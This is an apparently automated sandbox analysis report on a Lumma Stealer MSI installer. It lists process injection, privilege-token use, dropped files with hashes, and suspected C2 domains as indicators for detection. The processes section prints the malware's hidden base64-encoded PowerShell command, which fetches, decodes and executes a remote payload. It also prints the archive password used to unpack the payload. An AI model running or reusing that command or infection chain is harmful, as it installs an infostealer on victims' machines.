Malware Analysis Report

2024-11-30 05:23

Sample ID 240710-mmnpnasfrl
Target setup.msi
SHA256 5b3a41ed8a9a619b4aa18cef611c94b3273671ad464847cbfa600a6571c64431
Tags
lumma execution persistence privilege_escalation stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5b3a41ed8a9a619b4aa18cef611c94b3273671ad464847cbfa600a6571c64431

Threat Level: Known bad

The file setup.msi was found to be: Known bad.

Malicious Activity Summary

lumma execution persistence privilege_escalation stealer

Lumma Stealer

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Blocklisted process makes network request

Enumerates connected drives

Downloads MZ/PE file

Suspicious use of SetThreadContext

Drops file in Windows directory

Executes dropped EXE

Loads dropped DLL

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-10 10:35

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-10 10:35

Reported

2024-07-10 10:38

Platform

win10v2004-20240709-en

Max time kernel

93s

Max time network

115s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

Signatures

Lumma Stealer

stealer lumma

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSID3B2.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBB03.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBE22.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBFEA.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57b9ea.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBD36.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID818.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57b9ee.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBEBF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID334.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{982F5EC8-DA77-4501-8948-29ED7D39B6D6} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57b9ea.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBF4D.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3504 wrote to memory of 3732 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3504 wrote to memory of 3732 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3504 wrote to memory of 3732 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3504 wrote to memory of 3212 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 3504 wrote to memory of 3212 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 3504 wrote to memory of 1684 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 3504 wrote to memory of 1684 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 1684 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1684 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1684 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1684 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 2300 wrote to memory of 2728 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2300 wrote to memory of 2728 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2300 wrote to memory of 2176 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\8l1NdxTrgXQHW2m\svchost.exe
PID 2300 wrote to memory of 2176 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\8l1NdxTrgXQHW2m\svchost.exe
PID 2176 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\8l1NdxTrgXQHW2m\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2176 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\8l1NdxTrgXQHW2m\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2176 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\8l1NdxTrgXQHW2m\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2176 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\8l1NdxTrgXQHW2m\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2176 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\8l1NdxTrgXQHW2m\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 75714A0C7DFB524265608DAEE212D9FB

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe" x -p2161183588a "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar" "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\"

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AdAB3AG8ALQByAG8AbwB0AC4AYwBvAG0ALwAwADIAMAA3ADQALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=

C:\Users\Admin\AppData\Local\Temp\8l1NdxTrgXQHW2m\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\8l1NdxTrgXQHW2m\svchost.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 get-license2.com udp
US 104.21.17.66:443 get-license2.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 66.17.21.104.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 hit-1488.com udp
US 172.67.184.27:80 hit-1488.com tcp
US 8.8.8.8:53 27.184.67.172.in-addr.arpa udp
US 8.8.8.8:53 replica-souls.com udp
US 104.21.62.203:443 replica-souls.com tcp
US 8.8.8.8:53 two-root.com udp
US 104.21.27.114:443 two-root.com tcp
US 8.8.8.8:53 203.62.21.104.in-addr.arpa udp
US 8.8.8.8:53 114.27.21.104.in-addr.arpa udp
US 8.8.8.8:53 run-df.com udp
US 104.21.11.249:80 run-df.com tcp
US 104.21.11.249:443 run-df.com tcp
US 8.8.8.8:53 249.11.21.104.in-addr.arpa udp
US 8.8.8.8:53 respectabledpcs.shop udp
US 172.67.131.221:443 respectabledpcs.shop tcp
US 8.8.8.8:53 bouncedgowp.shop udp
US 172.67.214.52:443 bouncedgowp.shop tcp
US 8.8.8.8:53 bannngwko.shop udp
US 104.21.81.196:443 bannngwko.shop tcp
US 8.8.8.8:53 bargainnykwo.shop udp
US 104.21.47.93:443 bargainnykwo.shop tcp
US 8.8.8.8:53 affecthorsedpo.shop udp
US 8.8.8.8:53 221.131.67.172.in-addr.arpa udp
US 8.8.8.8:53 52.214.67.172.in-addr.arpa udp
US 8.8.8.8:53 196.81.21.104.in-addr.arpa udp
US 172.67.135.137:443 affecthorsedpo.shop tcp
US 8.8.8.8:53 radiationnopp.shop udp
US 104.21.68.158:443 radiationnopp.shop tcp
US 8.8.8.8:53 answerrsdo.shop udp
US 104.21.44.192:443 answerrsdo.shop tcp
US 8.8.8.8:53 publicitttyps.shop udp
US 172.67.134.88:443 publicitttyps.shop tcp
US 8.8.8.8:53 137.135.67.172.in-addr.arpa udp
US 8.8.8.8:53 93.47.21.104.in-addr.arpa udp
US 8.8.8.8:53 192.44.21.104.in-addr.arpa udp
US 8.8.8.8:53 158.68.21.104.in-addr.arpa udp
US 8.8.8.8:53 benchillppwo.shop udp
US 104.21.81.128:443 benchillppwo.shop tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 reinforcedirectorywd.shop udp
US 104.21.83.48:443 reinforcedirectorywd.shop tcp
US 8.8.8.8:53 88.134.67.172.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 128.81.21.104.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 48.83.21.104.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

C:\Windows\Installer\MSIBB03.tmp

MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

C:\Windows\Installer\MSIBF4D.tmp

MD5 1a2b237796742c26b11a008d0b175e29
SHA1 cfd5affcfb3b6fd407e58dfc7187fad4f186ea18
SHA256 81e0df47bcb2b3380fb0fb58b0d673be4ef1b0367fd2b0d80ab8ee292fc8f730
SHA512 3135d866bf91f9e09b980dd649582072df1f53eabe4c5ac5d34fff1aeb5b6fa01d38d87fc31de19a0887a910e95309bcf0e7ae54e6e8ed2469feb64da4a4f9e5

C:\Windows\Installer\MSID3B2.tmp

MD5 54d74546c6afe67b3d118c3c477c159a
SHA1 957f08beb7e27e657cd83d8ee50388b887935fae
SHA256 f9956417af079e428631a6c921b79716d960c3b4917c6b7d17ff3cb945f18611
SHA512 d27750b913cc2b7388e9948f42385d0b4124e48335ae7fc0bc6971f4f807dbc9af63fe88675bc440eb42b9a92551bf2d77130b1633ddda90866616b583ae924f

C:\Config.Msi\e57b9ed.rbs

MD5 91d7a39eec7c75f05c11905c7dee74fe
SHA1 efc0a0ec09aa62aea300b19b71d43d1c0e8e14aa
SHA256 8e38343f36e0614a29f792e3d7f73fac262d1a3e2581bd1ef2324a4ab5fd87ec
SHA512 980093cf40b3760acf4099e988935ca6c23991760a0b47c6ef10bcf7425904929e2c294f85f5999f5fe673c22e57c047924466adb39cf09ecb4238174421024b

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe

MD5 98ccd44353f7bc5bad1bc6ba9ae0cd68
SHA1 76a4e5bf8d298800c886d29f85ee629e7726052d
SHA256 e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b
SHA512 d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar

MD5 63efe86838e7196cedd93d7c10ac40e6
SHA1 61dcc0ce49355f1f44a7c2ee97ace10feece2e03
SHA256 9e7f5695c50bde002223c72084b44d8d22ab12c3ad2ce993e1f08ae90c6d6172
SHA512 7773e45af4c85b35aa9afb347fab3723eef9469cd4ed45fda89e058167a57b66b106ef8cce7fdc90701dd13279a8ab61e45f7f4c7df8fd084e6513f362483dac

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

MD5 ae63517a3ce7949a2c084cd7541c2fd8
SHA1 8dafa610a0c3aa6ee2e50f657c90757bfae80336
SHA256 14b6f5c640c73cdd99e5834e7a56ab3d2912abe623bf5e41946154dad69e5f26
SHA512 fd5a85d902b376226d14bafe7c9ad9aabfc5245c61e2c3c17d12227dccbd9aee3b21e59a9357349dabcdc5ecafda9fc2ab737e8f06d7b7490931648021b3c1f3

C:\Windows\Installer\e57b9ea.msi

MD5 6e619d3d24f58bfb7bd7e76a4756e258
SHA1 890359e1e86525c4c14e975e762239878134b32d
SHA256 5b3a41ed8a9a619b4aa18cef611c94b3273671ad464847cbfa600a6571c64431
SHA512 1a1f432c3c8ed5c627b2724b1fc5600ba31859838445b67d137c29439345e48bebe16074c3d9f909958af31670764422b379d7ced52c13feca7468e25a10162e

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnp.dll

MD5 1825d0310bf5029899f42004c4a1ef83
SHA1 ac79aab26730982838f5af5eadfa1e48f4625947
SHA256 1c45bf1b4b0dbbf3eec7fbe8d08640c8df98a9679c9753a295a5d2e29d8b6a58
SHA512 7c7c433b74c9b247401af4b72563256bfef055a8f5e65071ddcffe727502445be7760b64a1e7844e69c625dda899b928500dcb2c144defcc1ccf2ed206632145

memory/1684-162-0x000002A46E500000-0x000002A46E525000-memory.dmp

memory/1684-158-0x000002A46E880000-0x000002A46E881000-memory.dmp

memory/2300-163-0x0000000000800000-0x0000000000828000-memory.dmp

memory/2300-164-0x0000000000800000-0x0000000000828000-memory.dmp

memory/2300-165-0x0000000000800000-0x0000000000828000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rpyhnhql.ec1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2728-179-0x000002405DF80000-0x000002405DFA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8l1NdxTrgXQHW2m\svchost.exe

MD5 c3a8a0fd943924bfbd176c99df56ed2c
SHA1 8bc8d69cbec44704f062c08a919da992a425c720
SHA256 d1556baf48f206639e69f0e800e3360aa362f267c1c30b724140b6c713648df6
SHA512 71edb53cbf8d52d79615d5db834430870d6764ddcca4d8cf61d5fc4ddf404b259a974eb90944028ff20153561aa8b9fcc3374ae9badc6f6ac6b6d30150444f41

memory/2728-198-0x0000024078280000-0x000002407829C000-memory.dmp

memory/2300-225-0x0000000000800000-0x0000000000828000-memory.dmp

memory/2728-236-0x00000240788B0000-0x0000024078A72000-memory.dmp

memory/2728-237-0x0000024078FB0000-0x00000240794D8000-memory.dmp

memory/3276-244-0x0000000000600000-0x0000000000657000-memory.dmp

memory/3276-246-0x0000000000600000-0x0000000000657000-memory.dmp

memory/2176-245-0x00007FF732450000-0x00007FF732DD1000-memory.dmp

memory/2300-254-0x0000000000800000-0x0000000000828000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-10 10:35

Reported

2024-07-10 10:38

Platform

win7-20240704-en

Max time kernel

122s

Max time network

128s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
